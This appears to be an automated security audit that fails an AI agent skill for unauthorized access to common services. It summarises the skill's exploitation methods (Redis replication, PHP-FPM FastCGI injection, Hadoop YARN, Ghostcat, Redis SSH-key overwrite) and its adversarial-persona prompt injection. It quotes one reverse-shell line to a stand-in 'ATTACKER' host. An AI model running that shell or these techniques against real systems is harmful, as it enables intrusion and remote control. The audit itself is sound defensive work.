unauthorized-access-common-services
Fail
Audited by Gen Agent Trust Hub on Apr 10, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFEPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides numerous terminal commands designed to scan and exploit network services, including port scanning and interaction with unauthenticated management interfaces.
- [REMOTE_CODE_EXECUTION]: Contains specific payloads and procedures to achieve remote code execution across multiple service types, including the use of master-slave replication in Redis, FastCGI injection in PHP-FPM, and application submission in Hadoop YARN. It specifically includes functional reverse shell strings (
bash -i >& /dev/tcp/ATTACKER/4444 0>&1). - [DATA_EXFILTRATION]: Details methods to extract sensitive files and download entire data modules through misconfigured services like Rsync and AJP (Ghostcat).
- [CREDENTIALS_UNSAFE]: Provides a mechanism to achieve persistent unauthorized access by overwriting the root user's SSH
authorized_keysfile via Redis. - [PROMPT_INJECTION]: Employs instructions that direct the AI to assume an adversarial persona focused on infrastructure exploitation and unauthorized access.
Recommendations
- AI detected serious security threats
Audit Metadata